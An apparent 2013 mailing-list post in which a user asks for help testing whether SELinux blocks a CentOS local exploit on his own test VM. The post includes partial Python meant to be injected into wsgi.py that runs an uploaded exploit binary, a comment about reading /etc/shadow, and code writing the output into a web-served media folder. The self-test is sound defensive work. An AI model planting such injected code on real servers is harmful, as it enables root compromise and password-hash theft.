[CentralOH] Help Constructing a Science Experiment
joskra42.list at gmail.com
Tue May 14 19:27:53 CEST 2013
I just read about this CentOS vulnerability:
I am trying to construct a science experiment to see if SELinux properly
mitigates this attack. I spun up a new VM of my dev server, and I have a
website running via Apache and WSGI. I am trying to simulate a potential
attack whereby someone uploads the exploit to the media directory of a
Mezzanine-based app, and runs it by injecting malicious code into wsgi.py.
Far fetched, I know, but it's a science experiment after all.
The code noted below just causes the Apache thread to hang. I don't show
any SELinux AVC denials so I don't think the executable is being run. (But
that might not be a valid assertion, seeing that I'm testing SELinux in the
Does anyone see any glaring issues here?
# Evil hack: This command line works when run as a non-root user:
# echo "cat /etc/shadow" |
from subprocess import Popen, PIPE
cmd = '/srv/website/www/website/static/media/semtex_exploit'
p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
mtext = p.stdout.read()
with open('/srv/website/www/website/static/media/shadow', 'a') as the_file:
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the CentralOH